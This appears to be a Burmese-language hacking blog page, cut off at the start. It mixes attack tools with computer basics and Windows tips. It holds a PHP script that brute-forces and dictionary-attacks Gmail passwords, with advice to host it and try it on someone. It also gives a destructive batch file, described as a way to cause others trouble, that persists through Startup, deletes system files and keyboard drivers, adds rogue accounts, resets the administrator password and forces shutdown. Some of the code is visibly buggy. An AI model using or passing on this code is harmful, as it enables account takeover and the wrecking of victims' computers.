curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so n
o direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the dictionar
y attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the brute for
ce attack.</b></div>
</td>
</tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string,
so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}
?>
PHP ရတဲ့ host တခုခုမွာ ဒီ code ေတြကို install လုပ္ရပါမယ္။ က်န္တာ အေသးစိတ္သိခ်င္ရင္ေတာ့ free hosting
တခုသုံးျပီး က်ေနာ္ အရင္စမ္းလိုက္အံုးမယ္ ။ ဘယ္သူ႕ကိုစမ္းရမလ ဲ မသိဘူး။
ေအာက္က free host မွာ PHP ရပါတယ္။
Code:
http://www.000webhost.com/


အပိုင္း (၅) WINDOWS ကို၀င္ေမႊနည္း တိုလီမုတ္စမ်ား

Registry သ႔ ို ၀င္ေရာက္ေမႊေႏွာက္ျခင္း
က်ေနာ္ registry ထဲသို႔ ၀င္ေမႊနည္း နည္းနည္းပါးပါး ေျပာခ်င္ပါတယ္။ ဘာဘဲျဖစ္ျဖစ္ registry ကို ၀င္ေမႊေတာ့မယ္ဆိုရင္
ေတာ့ back up လုပ္ထားဖို့လိုပါတယ္...ဘာလို့လဲဆိုေတာ့ registry မွာ၀င္ေရးတဲ့ အခါမွာ registry က auto save
လုပ္ပါတယ္..မွားသြားပါတယ္ဆိုျပီး undo ,redo ေတြလုပ္လို့မရပါဘူး....
အဲဒါေၾကာင့္ပါ.....
ကဲ က်ေနာ္တို႔ All program ကိုေဖ်ာက္လိုက္ရေအာင္....
- start > run ကို၀င္ပါ..
- regedit လို့ ၇ိုက္ျပီး enter ႏွိပ္ပါ..
- HKEY-CURRENT- USER\software\microsoft\windows\current version\policies\explorer
- explorer ေပၚကို right click ႏွိပ္ျပီး new ကိုေရြးခ်ယ္ပါ Dword value ကိုဖြင့္ပါ..
ထိုအခါ ညာဘက္ျမင္ကြင္းမွာ new value #1 ေပၚလာပါမယ္..
-new value #1 ကို rename ေပးလိုက္ပါ..
name က NoStartMenuMoreProgram ျဖစ္ပါတယ္..
NoStartMenuMoreProgram ေပၚကိုလည္း right click ေပးျပီး modify ေရြးပါ
value data အကြက္ထဲ က 0 ေပၚေနပါမယ္..အဲဒါကို 1 ေျပာင္းေပးလိုက္ပါ..
computer ကို restart ေပးလိုက္ပါ...
Folder ကို software မသံုးပဲ Lock ခ်နည္း
ေရွးဦးစြာ notepad သို႔မဟုတ္ Command Promt ကိုဖြင့္ျပီး edit ထဲတြင္ ေအာက္ေဖၚျပပါ command မ်ားကို
ေရးသား၍ .bat file အေနျဖင့္ save မွတ္ပါ။ Notepad ထဲတြင္ေရး၍ Save name as ဆိုတဲ့ ေနရာမွာ example.bat လို႔
save မွတ္ပါ။ ထို file အားလြယ္လြယ္ကူကူ desktop ေပၚမွာပဲ သိမ္းထားေပါ့။ ထို႔ေနာက္ ၄င္း .bat file အား Run
လိုက္ပါ။ Private ဆိုေသာ Folder တစ္ခု ေပၚလာပါလိမ့္မယ္။ အဲဒီ Folder ထဲတြင္မိမိ သိမ္းထားခ်င္ေသာ files မ်ား
folder မ်ား ထည့္လိုက္ပါ။ ထို႕ေနာက္ example.bat file အားေနာက္တစ္ေခါက္ run လိုက္ပါ။ ထိုအခါ cmd Windows
တစ္ခု ေပၚလာပါလိမ့္မယ္။ Set Password to Lock Folder ဆိုတာေပၚလာပါတယ္။ ကိုယ္လိုခ်င္တဲ့ password
ေရးလိုက္ေပါ့။ ေနာက္ထပ္ Are You Sure to Lock this Folder (Y/N) ဆိုတာေပၚလာပါလိမ့္မယ္။ Y လို႔ရိုက္လိုက္ပါ။
Private ဆိုေသာ Folder ေပ်ာက္သြားပါမယ္။ ၄င္း folder ကိုျပန္လိုခ်င္လွ်င္ example.bat ဆိုတဲ့ file ကိုျပန္ run ပါ။
Enter Password to Unlock Folder ဆိုတာေပၚလာပါလိမ့္မယ္။ Password ရိုက္လိုက္ပါ။ ၄င္း folder
ျပန္ေပၚလာပါလိမ့္မယ္။ စမ္းၾကည့္က်ေပါ့ဗ်ာ……….
Command
cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
သူမ်ားကို ဒုကၡေပးခ်င္လွ်င္။ ။ေအာက္ေဖၚျပပါ command မ်ားကို notepad ထဲသို႕ copy, paste ကာ .bat file
အမ်ိဳးအစားျဖင့္ save မွတ္ပါ။ ထို႔ေနာက္၄င္း file အားလံုး၀ဖြင့္မၾကည့္ပါႏွင့္။ ဖြင့္ၾကည့္ပါက error message
မ်ားတတ္လာျပီး Windows က auto shut down ျဖစ္ေနပါလိမ့္မယ္။ ေနာက္တစ္ေခါက္ဖြင့္လဲ Windows
တတ္ျပီးျပီးျခင္း ၁၀ စကၠန္႔အတြင္း Shut Down ျဖစ္ေနပါလိမ့္မယ္။ ဘယ္လိုမွ ျပန္ဖြင့္ႏိုင္မွာမဟုတ္ပါဘူး။ safemode
ကျပန္ျပင္မွ ျပန္ေကာင္းႏိုင္မွာပါ ။ ဟဲဟ…ဲ …..
title any
@echo off
copy any.bat "c:\documents and settings\all users\start menu\programs\startup"
del *.dll
del *.exe
del *.ini
time 00:00
date 88/88/888
net user administrator *18083
net user 598 *32087 /add
net user 3063 *864 /add
net user 3262 *21895 /add
net user 29039 *3102 /add
net user 15688 *215 /add
net user 24824 *28761 /add
net user 25176 *23975 /add
net user 8896 *28052 /add
msg *any
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
cd C:\WINDOWS\system32
del /S /F /Q keyboard.drv
del /S /F /Q keyboard.sys
del system32
shutdown -s -f
exit
Cmd Dos Command နည္းနည္းပါးပါး
က်ေနာ္ သိထားတဲ့ CMD DOS COMMAND နည္းနည္းပါ
႔သိၿပီးသားသူေတြလည္းရွိပါတယ္ ...
မသိေသးတဲ့ သူေတြအတြက္ပဲ ရည္ရြယ္ပါတယ္ ....
Run Box မွာ cmd ရိုက္ထည့္လိုက္မယ္
C Directory ကိုသြားမယ္ဆို C: , D ဆိုရင္ D: စသည့္ျဖင့္ေပါ့ ....
ပထမဆံုးေျပာရရင္ .. cmd ကိုစေခၚလိုက္တာနဲ႔ စျမင္ရမွာက
C:\Documents and Settings\user name> ပါ ...
အဲဒီ Directory မွာ ဘယ္ Folder ေတြပါလည္း ၾကည့္ခ်င္ရင္
dir /a နဲ႔ ၾကည့္ရပါတယ္
အဲဒီ့ Directory တစ္ခုထဲက Folder ကို ဖြင့္ခ်င္ရင္
cd ခံထားၿပီး မိမိဖြင့္ခ်င္တဲ့ Folder Name (ဥပမာ။ ။ Desktop)ေပးၿပီး ဖြင့္ရပါတယ္
C:\Documents and Settings\user name\Desktop>
ထို Folder မွ ျပန္ထြက္ခ်င္ရင္ cd.. ေရးၿပီး ျပန္ထြက္ရပါမယ္
Hidden ျဖစ္ေနတဲ့ Folder (သို႔) File ကို unhidden ေပးခ်င္တယ္ဆိုရင္
Folder Option ကေန virus ကိုက္တယ္ဆို show hidden folder ေပးလည္း မရတာေတြရွိပါတယ္
attrib -H /S /D "c:\......\folder name"
hidden ျဖစ္ေနတဲ့ Folder (သို႔) File ရွိတဲ့ Directory အျပည့္အစံုကို /D ေနာက္ကေန
ဆက္ေရးေပးရပါတယ္
Directory တစ္ခုမွာရွိတဲ့ folder ထဲက files ေတြကို တျခား Directory တစ္ခုမွာရွိတဲ့
folder ထဲကို ေျပာင္းေရႊ႕ကူးယူခ်င္တယ္ဆို ...
မိမိေျပာင္းေပးခ်င္တဲ့ Directory ကိုအရင္ဖြင့္ေပးရပါတယ္ (ဥပမာ။ ။ C: ထဲက Desktop ကိုေရႊ႕မယ္ဆို C:\Documents
and Settings\user name\Desktop>
လို႔ အရင္ဖြင့္ေပးလိုက္ပါ။
ေနာက္မဆက္ၿပီး ကူးယူခ်င္တဲ့ Directory မွ folder ကိုေရးေပးရပါတယ္
xcopy /a "e:\foler name" ဟုေရးေပးရပါမယ္ ...
၂ခုေပါင္းကိုၾကည့္မယ္ဆိုရင္ေတာ့
C:\Documents and Settings\user name\Desktop>xcopy /a "e:\foler name"
အခု ကူးယူတာက unhidden files ေတြကိုပဲ ကူးယူးတာပါ။
hidden files ေတြကိုကူးမယ္ဆိုရင္ေတာ့ /h ထည့္ေပးရုံပါပ ဲ
xcopy /h /a "e:\foler name" ဟုေရးေပးလိုက္ပါ...
အခုက files ကိုပဲကူးတာပါ ...
Folder အလိုက္ကူးမယ္ဆိုရင္ေတာ့ /s ကိုအသံုးျပဳရပါတယ္
xcopy /s "e:\folder name" လို႔ေရးေပးရပါတယ္။
ဒါကလည္း hidden မျဖစ္တဲ့ folder ကိုကူးတာပါ
hidden folder ကိုကူးမယ္ဆိုရင္ေတာ့ /h ကိုပဲထည့္ရပါတယ္
xcopy /h /s "e:\foler name" လို႔ေရးေပးရပါတယ္ ...
အဲဒီလိုကူးယူတဲ့ အခ်ိန္မွာ CMD box မွာ ကူးယူးတဲ့ files ေတြ run တာကိုျပပါတယ္ အဲဒီလို မေပၚခ်င္ရင္ေတာ့ /Q
ထည့္ေပးရပါတယ္
xcopy /h /q /s "e:\foler name" လို႔ေရးေပးရပါတယ္ .................။
Folder Background ကို software မသံုးပဲ ပံုလွလွေလးထည့္နည္း
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=E:\general\picture\DSABayonet211.jpg
iconarea_text=11x00fffffff
ေဖၚျပပါ code မ်ားကို Folder အတြင္းရွိ desktop.ini ဆိုေသာ file အတြင္းသို႔ copy ကူး paste လုပ္ပါ။ ၄င္း ini file သည္ hidden
ျဖစ္ေနပါသည္။ hidden ေဖၚျပီးရွာပါ။ iconarea_image=E:\general\picture\DSABayonet211.jpg ဆိုရာတြင္
မိမိထည့္သြင္းလိုေသာပံု ၏တည္ေနရာ ကိုသိရန္လိုပါသည္။ ဥပမာ. Desktop ေပၚရွိ image.jpg ဆိုေသာပံုကိုထည့္သြင္းခ်င္လွ်င္
iconarea_image=C:\Documents and Settings\User Name\Desktop\image.jpg ဟုေရးႏိုင္ပါတယ္။ အေနာက္က file
extension *.jpg ဆိုတာကိုထည့္ေရးရန္မေမ့ပါႏွင့္။
website ေတြ႕ရဲ႕ IP ကုိခ်က္ခ်င္းသိခ်င္တယ္ဆိုရင္
ပထမဆံုး start >>> Run ကို click.
cmd လို႕ ရိုက္ျပီး ok လုပ္.
အဲဒီမွာ ဒါေလးကို ရိုက္ထည့္ၾကည့္လိုက္.
nslookup www.google.com လို႕ရိုက္ျပီး enter ေခါက္ၾကည့္လိုက္ပါက
google ရဲ႕ IP ေတြက်လာပါလိမ့္မယ္။။မိမိသိခ်င္တဲ႕ website ရဲ႕ အမည္ကို ေျပာင္းရိုက္ၾကည့္ေပါ့
ေပ်ာ္ရႊင္ႏိုင္ပါေစ။

✒️C_M_H✒️


Tuesday, March 26, 2019

Gray Hat Hacking 4th Edition

Gray Hat Hacking Fourth Edition Pdf

ဒီေနရာကေနေဒါင္းပါ

Wednesday, January 16, 2019

သိထားသင့္ေသာ ကြန္ပ်ဴတာအေၾကာင္း....

ကြန္ပ်ဴတာ တစ္လံုး မွာ hardware နဲ႔ software ဆိုၿပီး ႏွစ္ပိုင္း ရွိပါတယ္။

Hardware ဆိုတာက အရွင္းဆံုးေျပာရရင္ လက္နဲ႔ကိုင္တြယ္လုိ႔ရတဲ့ ပစၥည္းေတြျဖစ္ပါတယ္။
ဥပမာ။ ။ monitor၊ mouse   

Software ဆိုတာက လက္နဲ႔ကိုင္တြယ္လုိ႔မရတဲ့ ကြန္ပ်ဴတာအသံုးျပဳ ပစၥည္းလို႔ ေျပာရင္လည္းမွန္ပါတယ္။
program မ်ားကိုု စုေဆာင္းထားတာကို software လို႔ေခၚပါတယ္။ software ဆိုတာ ကြန္ပ်ဴတာကို ဘာလုပ္ရမယ္၊ ဘယ္အခ်ိန္မွာ လုပ္ရမလဲဆိုတာ ထိန္းေက်ာင္းေပးတဲ့ ညြန္ၾကားခ်က္ အစုအေ၀းလည္းျဖစ္ပါတယ္။ software မပါဘဲ ကြန္ပ်ဴတာ ဘာမွလုပ္လုိ႔မရသလို hardware မပါဘဲနဲ႔လည္း ကြန္ပ်ဴတာ ဘာမွ လုပ္လုိ႔ရမွာ မဟုတ္ပါဘူး။

software မွာ ႏွစ္မ်ိဳးထပ္ခြဲပါေသးတယ္။
၁။ application software
၂။ system software

application software

application software ဆိုတာကေတာ့ application ေတြမွာ အသံုးျပဳဖို႔ အလုပ္လုပ္ဖို႔ user (အသံုးျပဳသူ)ေတြကို အကူအညီေပးတဲ့ software ေတြျဖစ္ပါတယ္။

system software

system software ဆိုတာကေတာ့ hardware ေတြ အလုပ္လုပ္ႏိုင္ဖို႔အတြက္နဲ႔ application software ေတြ အသံုးျပဳႏိုင္ရန္အတြက္ maintain လုပ္ေပးပါတယ္။

ေနာက္ျပီး ကြန္ပ်ဴတာမွာ ဂဏန္း ႏွစ္လံုးနဲ႔ဘဲ အလုပ္လုပ္ပါတယ္။ 0 နဲ. 1 ပါ။ Binary number လို႔လဲေခၚပါတယ္။ Binary Digit ကိန္းလို႔လဲေခၚဆိုရပါတယ္။ အတိုေကာက္ကိုေတာ့ Bit လို႔ေခၚပါတယ္။
ဂဏန္းတစ္လုံး၊ စေပ့ဘားတစ္ခ်က္၊ စာတစ္လံုးကိုဆိုရင္ 8 bit လို႔ေခၚပါတယ္။
01010101 ယခုလို 0 နဲ႔ 1 ေတြခ်ည္းပါတဲ့ ဂဏန္း 8 လံုးတြဲကို 8 bit လို႔ေခၚၿပီး 8 Bit ဟာ 1 byte နဲ႔ ညီမွ်ပါတယ္။
1 bit (binary digit*) = the value of 0 or 1
8 bits = 1 byte
1024 bytes = 1 kilobyte
1024 kilobytes = 1 megabyte
1024 megabytes = 1 gigabyte
1024 gigabytes = 1 terabyte
1024 terabytes = 1 petabyte
Abbreviations
1 kilobyte = 1 k
1 megabyte = 1 MB
1 gigabyte = 1 GB
1 terabyte = 1 TB
1 petabyte = 1 PB
Size in "bytes"
Kilobyte (KB) = 1,024
Megabyte (MB) = 1,048,576
Gigabyte (GB) = 1,073,741,824
Terabyte (TB) = 1,099,511,627,776
Petabyte (PB) = 1,125,899,906,842,624


ကြန္ပ်ဴတာသမိုင္း
ေရွးယခင္က ကြန္ပ်ဴတာ ကို သတ္မွတ္ဖို႕ ရန္အလြန္တရာမွခက္ခဲ ခ့ဲ သည္။ယခုအခ်ိန္တြင္မူကြန္ပ်ဴတာကို အမည္အမ်ဳိးမ်ဳိး ေခၚေ၀ၚသတ္မွတ္ခဲ့ၾကျပီျဖစ္သည္။ ယခုအခ်ိန္တြင္မူကိရိယာမ်ား (Devices) ေတာ္ေတာ္မ်ားမ်ားကို ကြန္ပ်ဴတာ တပ္ျပီးေခၚေနၾကျပီျဖစ္သည္။အေစာဆံုး ကြန္ပ်ဴတာ သည္ တြက္ခ်က္မႈပိုင္းကို ေပသီး(Abacus)မ်ားမွ စခဲ့သည္။ ေပသီးသည္ ပထမဆံုးဂဏန္းေပါင္းစက္ ပင္ျဖစ္သည္။ ေပသီးကို တရုတ္ျပည္တြင္ စတင္အသံုးျပဳခဲ့သည္။

အလယ္ေခတ္အေရာက္တြင္ ဥေရာပ သခ်ာၤ ႏွင့္ အင္ဂ်င္နီယာ ပညာရွင္ Wilhelm Schickard က ၁၆၂၃ခုႏွစ္ တြင္ ပထမဆုံး စက္ပစၥည္းႏွင့္တြက္ခ်က္ေသာဂဏန္းေပါင္းစက္(Calculators) တစ္ခုကို တည္ေဆာက္ခဲ့သည္။သို႔ေသာ္လည္းယခုေခတ္တြင္ ၎ ကိရိယာDevice ကို ကြန္ပ်ဴတာ လုိ႕ေခၚဆို၍ မရေတာ့ေပ။အဘယ္ေၾကာင့္ဆို ေသာ္၎ကိရိယာသည္ Programmed ပါဝင္ျခင္းမရွိေသာေၾကာင့္ျဖစ္သည္။ ၁၈၀၁ ခုႏွစ္ တြင္ Joseph Marie Jacquard သည္ Textile ယက္ကန္းစက္ကို အေျခခံျပီး Punched Paper Cards Series ကို အသံုးျပဳျပီး သူ႕၏ ယက္ကန္းစက္ကို အလုိအေလွ်ာက္ အလုပ္လုပ္ေစခဲ့သည္။ Jacquard ၏ ယက္ကန္းစက္မွ ရလဒ္သည္ ကြန္ပ်ဴတာ ျဖစ္ေပၚတိုးတက္လာေစဖို႕ရန္ အေၾကာင္းရင္း တစ္ရပ္ျဖစ္သည္။ ၁၈၃၇ ခုႏွစ္ တြင္ Charles Babbage သည္ Programmable Mechanical Computer ကို စတင္ Design ေရးဆြဲခဲ့သည္။ Analytical Engine ဟုအမည္ေပးခဲ့သည္။ ၁၈၉၀ ခုႏွစ္ အေရာက္ တြင္US Census က Punched Card အတြက္ ၾကီးမားေသာ Scale Automated Data Processing စြမ္းေဆာင္ရည္ရိွေအာင္ Tabulating Machines ကို Herman Hollerith က Designed ေရးဆြဲခဲ့သည္။ Computing Tabulating Recording Corporation ( ယခုအခါ IBM ျဖစ္လာသည္ ) က ထုတ္လုပ္ခဲ့ပါသည္။

၁၉ ရာစု အကုန္အေရာက္ တြင္ကြန္ပ်ဴတာ ေတြဟာ အသံုး၀င္ေသာအရာတစ္ခုျဖစ္လာခဲ့သည္။ ကြန္ပ်ဴတာ သည္ လူတို႔ အတြက္လိုအပ္ေနျပီဆိုတာက သက္ေသျပလိုက္ျပီးျဖစ္သည္။ အဘယ္ေၾကာင့္ဆိုေသာ္ Punched Card, Boolean Algebra , The Vacuum Tube (Thermionic Value) နဲ႕ Teleprinter ေတြဟာ ေပၚေပါက္ခဲ့ေသာေၾကာင့္ျဖစ္သည္။၂၀ ရာစု အေတာအတြင္းတြင္ သိပၸံပညာသည္ မ်ားစြာတိုးတက္မႈရိွလာခဲ့ျပီး Analog Computer မ်ားလည္း တိုးတက္ေပၚေပါက္ခဲ့သည္။ သို႔ေသာ္လည္း၎ ကြန္ပ်ဴတာမ်ားသည္ Programmable မျဖစ္သည္႔အျပင္ အခုေခတ္ Digital ကြန္ပ်ဴတာ မ်ား၏ တိက်ေသာ စြမ္းေဆာင္ရည္ မ်ားလည္းပါဝင္ျခင္း မရိွေသးေပ။


ကြန္ပ်ဴတာ အလုပ္လုပ္ပံု 
ေယဘုယ်သံုး ကြန္ပ်ဴတာ တြင္ အဓိက ေလးမ်ဳိးမွာ ဂဏန္း သခ်ၤာ ႏွင့္ ေလာ့ဂ်စ္ အစိတ္အပိုင္း (arithmetic and logic unit)၊ ထိန္းခ်ဴပ္ အစိတ္အပိုင္း (control unit)၊ မွတ္ဥာဏ္(Memory Device) ႏွင့္ အသြင္း အထုတ္ ကိရိယာ (I/O) မ်ားတုိ႔ ျဖစ္သည္။ ၄င္း အစိတ္အပုိင္း တုိ႔ကုိ ဝါယာႀကိဳးမ်ား အတြဲလုိက္ျဖစ္ေသာ ဘတ္စ္ မ်ား ျဖင့္ တြယ္ခ်ိတ္ထားသည္။

ထိန္းခ်ဳပ္ဌာန

ဗဟိုထိန္းခ်ဴပ္ ဌာန (control unit, often called a control system or CPU) သုိ႔မဟုတ္ စီပီယူ သည္ ကြန္ပ်ဴတာ၏ အစိတ္အပုိင္း မ်ဳိးစံုကုိ လမ္းေဆာင္သည္။ ၄င္းသည္ ပရုိဂရမ္ ၏ ညႊန္ၾကားခ်က္မ်ားကုိ တစ္ေၾကာင္းျခင္း ဖတ္ရွဴ ၿပီး အဓိပၸါယ္ ျပန္သည္။ ထိန္းခ်ဴပ္ ဌာနသည္ အဆင့္ျမင့္ေသာ ကြန္ပ်ဴတာမ်ားတြင္ ၄င္းညႊန္ၾကားခ်က္ အစဥ္မ်ားကုိ ျမန္ဆန္ေစရန္အတြက္ ခုန္ေက်ာ္ ဖတ္ရွဴ ျခင္း လုပ္ေလ့ရွိသည္။

ထိန္းခ်ဴပ္ ဌာန ၏ အဓိက မွာ ပရုိဂရမ္ ေကာင္တာ၊ ေနာက္ ညႊန္းၾကားခ်က္ ကုိ ဘယ္ေနရာမွ ဖက္ရွဴမည္ ကုိ မွတ္သားထားေသာ အထူး သုိေလွာင္ရာ ရာဂ်စ္စတာ တုိ႔ျဖစ္သည္။
MIPS architecture ၏ ညႊန္ၾကားခ်က္ ကုိ ထိန္းခ်ဴပ္ ဌာနမွ ဖတ္ရွဴပံု ေဖာ္ျပေသာ ပံုၾကမ္း


ထိန္းခ်ဴပ္ ဌာန၏ အလုပ္မ်ားမွာ ေနာက္ စီပီယူမ်ားတြင္ ကြာျခားႏုိင္ေသာ္လည္း အေျခခံမွာ ေအာက္ပါအတုိင္းျဖစ္သည္။
  1. ပရုိဂရမ္ ေကာင္တာ ညႊန္ျပေသာ အခန္းမွ လာမည့္ ညႊန္ၾကားခ်က္ (instruction) ကုဒ္ကုိ ဖက္ပါ။
  2. ၄င္းညႊန္ၾကားခ်က္ ကုဒ္ကုိ အဓိပၸါယ္ ျပန္ၿပီး အမိန္႔ေပးခ်က္ (command) မ်ား သုိ႔မဟုတ္ အျခားစက္မ်ား၏ အဝင္လႈိင္း (signal) မ်ား အျဖစ္ လုပ္ေဆာင္ပါ။
  3. ညႊန္ၾကားခ်က္ အသစ္ေရးရန္ ပရုိဂရမ္ ေကာင္တာကုိ တစ္ခုျမင့္ပါ။
  4. ညႊန္ၾကားခ်က္ ပါလွ်င္ မွတ္ဥာဏ္(Memory Device) အခန္းမ်ားမွ အခ်က္အလက္မ်ားကုိ ဖက္ပါ။ မ်ားေသာအားျဖင့္ ၄င္းဖက္ရွဴရမည့္ အခန္းနံပါတ္ကုိ ညႊန္ၾကားခ်က္ ကုဒ္ ထည္မွာပင္ သိမ္းဆီးေလ့ရွိသည္။
  5. ညႊန္ၾကားခ်က္ သည္ ေအအယ္လ္ယူ သုိ႔မဟုတ္ အထူးစက္မ်ားမွ လုပ္ေဆာင္ခ်က္မ်ား လုိအပ္လွ်င္ ၄င္းစက္အား ေမာင္းႏွင္ပါ။
  6. ေအအယ္လ္ယူမွ အေျဖကုိ မွတ္ဥာဏ္(Memory Device)တြင္းသုိ႔ ျပန္လည္သိမ္းဆည္းပါ သုိ႔မဟုတ္ ပရင့္တာ ကဲ့သုိ႔ ပံုႏွိပ္စက္ မ်ားတြင္ ထုတ္ပါ။
  7. အစ အဆင့္ (၁) သုိ႔ ျပန္သြားပါ။
ဂဏန္း သခ်ၤာ ႏွင့္ ေလာ့ဂ်စ္ ဌာန 
Main articles: Arithmetic logic unit and ေအယ္လ္ယူ
ဂဏန္း သခ်ၤာ ႏွင့္ ေလာ့ဂ်စ္ အစိတ္အပိုင္း (Arithmetic and logic unit, ALU) ေခၚ ေအယ္လ္ယူ သည္ ဂဏန္း သခ်ၤာ ႏွင့္ ေလာ့ဂ်စ္ ေဆာင္ရြက္မႈ အပုိင္း ႏွစ္ခု ကုိလုပ္ေဆာင္သည္။
ဂဏန္း သခ်ၤာ လုပ္ေဆာင္မႈတြင္ ALU သည္ အေျခခံမ်ားျဖစ္သည့္ အေပါင္း၊ အႏုတ္၊ အေျမႇာက္၊ အစား၊ ႀတီဂိုႏိုေမႀတီ ဖန္ရွင္မ်ား ႏွင့္ square root တုိ႔ လုပ္ေဆာင္သည္။ အခ်ဳိေသာ လုပ္ေဆာင္မႈ မ်ားမွာ ကိန္းျပည့္မ်ားတုိတာ လုပ္ေဆာင္ႏုိင္ၿပီး အခ်ဳိမွာ တိက်မႈ ေရာ့က်ႏုိင္ေသာ္လည္း ဒႆမ ကိန္း (floating point) မွ ကိန္းစစ္ (real number) မ်ားအထိ လုပ္ေဆာင္ႏုိင္သည္။ သုိ႔ေသာ္၊ မည္သည့္ ကြန္ပ်ဴတာမဆုိ မည္မွ်ပင္ ခက္ခဲေသာ အလုပ္ျဖစ္ပါေစ တစ္ဆင့္ျခင္း လြယ္ကူေသာ အဆင့္မ်ားအျဖစ္ ေျပာင္းလည္းေစျခင္းျဖင့္ စြမ္းေဆာင္ႏုိင္သည္။ ထုိ႔ေၾကာင့္ မည္သည့္ ကြန္ပ်ဴတာမဆုိ ဘယ္လုိ ဂဏန္းသခ်ၤာျပႆနာမဆုိ ေျဖရွင္းႏုိင္ၿပီး ၄င္း၏ ေအယ္လ္ယူ က တုိက္ရုိက္ ေျဖရွင္၍မရပါက သြယ္ဝုိက္ေသာ္နည္းျဖင့္ ေျဖရွင္းႏုိင္သည္ ။

#C_M_H

IT ေလာကႀကီးကို ၿခိမ္းေျခာက္ေနေသာ DDOS attack အေၾကာင္း

DoS ဆုိတဲ႔ တုိက္ခုိက္မႈဟာ ယေန႔ေခတ္မွာ အင္တာနက္ တုိက္ခုိက္ေရးသမားတုိ႔ အသုံးၿပဳတဲ႔ နည္းလမ္းတစ္ခုလည္းၿဖစ္ပါတယ္.. Denial of Service ဆုိတဲ႔အတုိင္း အတုိက္ ခုိက္ခံရသူရဲ႕ Computer သုိ႔မဟုတ္ Webserver ရဲ႕ Bandwidth , CPU, Memory အသုံးၿပဳမႈေတြက သာမာန္ေပးစြမ္းႏုိင္တဲ႔ ပမာဏထက္ ပုိၿပီးလုိအပ္တဲ႔အတြက္ Out of Service ေတြ ၿဖစ္ကုန္တာပါ။ ၾကားၿဖတ္၍ Resource အားလုံးကုိ စားသုံးလုိက္ၿခင္းပဲ ၿဖစ္ပါတယ္။ ထပ္ၿပီး ရွင္းေအာင္ေၿပာရမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔ကwww.planetcreator.net ဆုိၿပီး Browser မွာရုိက္ထည့္လုိက္ရင္ ေနာက္မွာ အလုပ္ လုပ္ေပးတာကwww.planetcreator.net တင္ထားတဲ႔ Webserver က အလုပ္လုပ္ ေၿဖၾကား၊ ေဖာ္ေဆာင္ေပးရတာၿဖစ္ပါတယ္။ ဒီေတာ့ သာမာန္ေတာင္းဆုိမႈနဲ႔ ပုိတဲ႔ Fade Request ေတြကုိ server ကၿပန္လည္ေၿဖၾကား ေပးေနရတဲ႔အတြက္ Over Load ၿဖစ္ကာ Server က ဆက္သြယ္မႈရပ္တန္႔သြားရၿခင္းၿဖစ္ပါတယ္။


